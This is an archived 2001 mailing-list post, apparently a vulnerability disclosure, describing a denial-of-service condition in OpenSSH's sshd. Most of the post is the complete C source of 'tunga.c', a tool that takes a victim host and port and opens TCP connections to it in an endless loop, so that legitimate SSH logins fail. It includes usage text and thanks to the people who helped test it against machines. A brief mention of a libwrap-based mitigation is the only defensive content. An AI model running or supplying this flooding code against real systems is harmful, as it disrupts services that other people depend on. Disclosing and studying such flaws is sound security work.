--[ OpenSSH DoS Attack proof of concept ]-- by DrBrain <drbrainat_private> / http://www.phibernet.org --[ Intro ]-- After some tests with sshd, I have noticed that it is possible to generate a DoS attack that gives you the following message when you try to contact the service: ---------- $ ssh userat_private ssh_exchange_identification: Connection closed by remote host ---------- This just happens while running the code bellow, because when you stop running it everything works fine. It seems to be a known problem ( http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there is no patch available and this problem is present in all OpenSSH versions. Although, there is an advisory to compile the SSH server with libwrap (TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in order to allow connections to sshd from any source address. Anyway, I have made some tests and ALL the machines where vulnerable. In my opinion it is urgent to fix this as soon as possible. --[ Code ]-- #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <stdio.h> #include <unistd.h> int main (int argc, char *argv[]) { int sd, rc; struct sockaddr_in localAddr, servAddr; struct linger ling; struct hostent *h; if(argc < 3) { printf("tunga.c - OpenSSH DoS Attack\n"); printf("by DrBrain <drbrainat_private>\n"); printf("Phibernet Information Network < http://www.phibernet.org >\n\n"); printf("Usage: %s <victim> <port>\n\n",argv[0]); exit(1); } h = gethostbyname(argv[1]); if(h==NULL) { printf("%s: Unknown Host '%s'\n",argv[0],argv[1]); exit(1); } for(;;) { servAddr.sin_family = h->h_addrtype; memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); servAddr.sin_port = htons(atoi(argv[2])); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd<0) { perror("Cannot Open Socket "); exit(1); } rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); if(rc<0) { perror("Cannot Connect "); exit(1); } } exit(0); } That's it! I would like to thank megas and FatZU and all the guys in Phibernet for helping me with some machines while testing the DoS. -- DrBrain "If you don't have a hammer, hack it" ;)
This archive was generated by hypermail 2b30 : Mon Dec 10 2001 - 16:56:29 PST